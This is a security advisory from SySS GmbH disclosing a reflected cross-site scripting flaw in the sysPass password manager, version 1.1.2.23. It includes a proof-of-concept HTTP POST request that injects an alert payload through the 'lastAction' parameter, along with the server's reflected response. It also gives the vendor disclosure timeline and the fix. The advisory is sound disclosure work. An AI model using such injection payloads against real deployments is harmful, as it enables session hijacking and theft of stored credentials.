sysPass 1.1.2.23 Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-047  
Product: sysPass  
Vendor: http://cygnux.org/  
Affected Version(s): 1.1.2.23 and below  
Tested Version(s): 1.1.2.23  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Vendor Notification: 2015-07-14  
Solution Date: 2015-10-26  
Public Disclosure: 2015-12-07  
CVE Reference: Not yet assigned  
Author of Advisory: Daniele Salaris (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
sysPass is an web based Password Manager written in PHP and Ajax with a  
built-in multiuser environment.  
  
The functionality "Account Details" is prone to a reflected cross-site  
scripting vulnerability.  
  
The software manufacturer describes the web application as follows  
(see [1]):  
  
"sysPass is a web password manager written in PHP that allows the  
password management in a centralized way and in a multiuser environment.  
The main features are:  
  
* HTML5 and Ajax based interface  
* Password encryption with AES-256 CBC.  
* Users and groups management.  
* Advanced profiles management with 16 access levels.  
* MySQL, OpenLDAP and Active Directory authentication.  
* Activity alerts by email.  
* Accounts change history.  
* Accounts files management.  
* Inline image preview.  
* Multilanguage.  
* Links to external Wiki.  
* Portable backup.  
* Action tracking and event log.  
* One-step install process."  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The PHP script ajax_getContent.php of the web application functionality  
"Account Details" is vulnerable to reflected cross-site scripting  
via the parameter "lastAction".  
  
The web application sysPass inserts the injected code into the "back"  
button of the result web page where it can be triggered.  
  
This reflected cross-site scripting vulnerability can be exploited in  
the context of an authenticated user by sending a specially crafted HTTP  
POST request (see PoC section).  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following HTTP POST request using the JavaScript code "'-alert(1)-'"  
as the value for the parameter "lastAction" demonstrates the reflected  
cross-site scripting vulnerability by showing a JavaScript alert box  
after the "back" button was clicked:  
  
POST /sysPass/ajax/ajax_getContent.php HTTP/1.1  
Host: <HOST>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0  
Accept: text/html, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost/sysPass/index.php  
Content-Length: 74  
Cookie: PHPSESSID=<SESSIONID>  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
action=accview&lastAction=accsearch'-alert(1)-'&id=1&isAjax=1  
  
  
The server answers as follows:  
  
HTTP/1.1 200 OK  
(...)  
<img src="imgs/back.png" title="Back" class="inputImg" id="btnBack"  
OnClick="doAction('accsearch'-alert(1)-'', 'accview',1)"/>  
(...)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The reported security vulnerability has been fixed in a new software  
release. Update to the new software version.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-07-14: Vulnerability discovered  
2015-07-14: Vulnerability reported to vendor  
2015-10-26: Release of new software version that addresses the reported  
security issue.  
2015-12-07: Public release of security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Web site of sysPass - sysadmin password manager  
http://wiki.syspass.org/en/start  
[2] SySS Security Advisory SYSS-2015-047  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-047.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Daniele Salaris of the SySS GmbH.  
  
E-Mail: disclosure (at) syss.de  
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBCgAGBQJWZTi3AAoJECjfs6cKmKnUUW0P/2AkQ/8y7xiv3I+LVSyb8STZ  
XPVGYCBoqaTO2aQUeaMlE5pOYS0NzSsogFJuVk61D/GI6zI0IxJp22U0Myu9u0Af  
rNn7zfjtmJvR80xbIEfPdnFXRXic9V8vazrBUUpMVhRjaF8ox5Hx9m04YzMQrdYt  
u9vLumjT8cpLpLu+jzEET1p1+itpmI/Ru6M+VqdAS0jFRImemqIT/o5U18G6ayvG  
JZ2W2HCybu/ErQEw/FtOFK/SGAi8egCLdwEnFoeTxlz4uQNYFe/4MGbzFWgH1p5t  
euyrMEyGkqWSaIuyskKoHqW9sYc3wlFzmYLxCIk7HhmXqdJwXuDwBtTRqFI2t2k2  
BVJK53xCo727W9IMQqtbqpCNrU5ojKtMr/CxslYFiIHddSRvEuiccDgI3ZKyp+xA  
o7GVND9fdNkIX1Njbmb9hBtyygDTAkz1RPN92l3L4ESF5fEgXCeVHy5xdl7KoD4w  
GDAh718tE2cQXqTRhBk1uWzvjjcbDcQ3PLnMhS4nd9l10amyfXRn5zQyOQBi746H  
BXUGAD4S6VDLt4MGkTYDHYrkmzYSGhPoU5/t0L6thjkeSt+YjIhtjafXl+xj046J  
e6s5ozyIaJD+CFPwyKByzAjyW0R4wCoEV+8jJVotxf8xzjRDMJEx4A059WFi1602  
TAg4fytmdoelxYtdJNHN  
=xgz1  
-----END PGP SIGNATURE-----  
`